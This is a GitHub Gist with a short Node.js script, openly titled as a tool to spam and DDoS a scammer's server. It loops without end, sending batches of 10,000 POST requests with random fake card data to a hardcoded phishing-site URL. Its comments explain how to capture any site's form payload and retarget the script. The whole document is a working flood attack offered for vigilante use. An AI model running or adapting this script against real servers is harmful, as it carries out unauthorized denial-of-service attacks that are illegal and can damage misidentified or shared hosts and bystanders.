Last active
October 12, 2023 07:17
-
-
Save imballinst/ae9d3955ddf593e85fec2aedbb2514fd to your computer and use it in GitHub Desktop.
Script to spam and DDoS scammer's server
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import axios from 'axios' | |
// How to use this script: | |
// | |
// 0. Create a directory (with any name), then inside that directory, initialize package.json with `npm init -y`, then install axios with `npm install axios`. | |
// 1. Identify the website that the scammer use. Prefer use desktop browser with private window, just in case. | |
// 2. Fill out their form (do this with the Network in DevTools open). Don't use real values, just use random values. | |
// 3. After finding out the request payload (and possibly headers), adjust the below script accordingly. | |
// 4. Run with `node abuse-scammer-server.mjs` (or whatever the file name is in your local machine). | |
// 5. See if their server goes down! Usually websites that scammers use don't really have a good DDoS or spam protection, so, yeah. | |
const array = Array.from(new Array(10000), () => 1) | |
async function main() { | |
// Basically what this does is: | |
// I don't care if the request is succsesful or failed, just keep sending the 10k request repeatedly. | |
// Send out the requests until the scammer website is down, but even if the website is not down, their database | |
// will almost likely contain tons of spam from these requests. | |
while (true) { | |
await Promise.allSettled( | |
// Change the URL to the scammer website's URL. | |
array.map(() => axios('http://formulirpilihan-tarif.online/BNI-tarif/reset1.php', { | |
method: 'post', | |
headers: { | |
// Change this accordingly, maybe the scammer website uses `application/json` | |
// instead of `application/x-www-form-urlencoded`.z | |
"Content-Type": "application/x-www-form-urlencoded" | |
}, | |
data: { | |
// Change this accordingly to the request payload that you observe in the Network DevTools. | |
input: 'input', | |
no: `${Math.random() * 100000000}`, | |
mb: `${Math.random() * 100000000}`, | |
cvv: `${Math.random() * 100000000}`, | |
Rp: `${Math.random() * 100000000}`, | |
} | |
})) | |
) | |
} | |
} | |
main() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment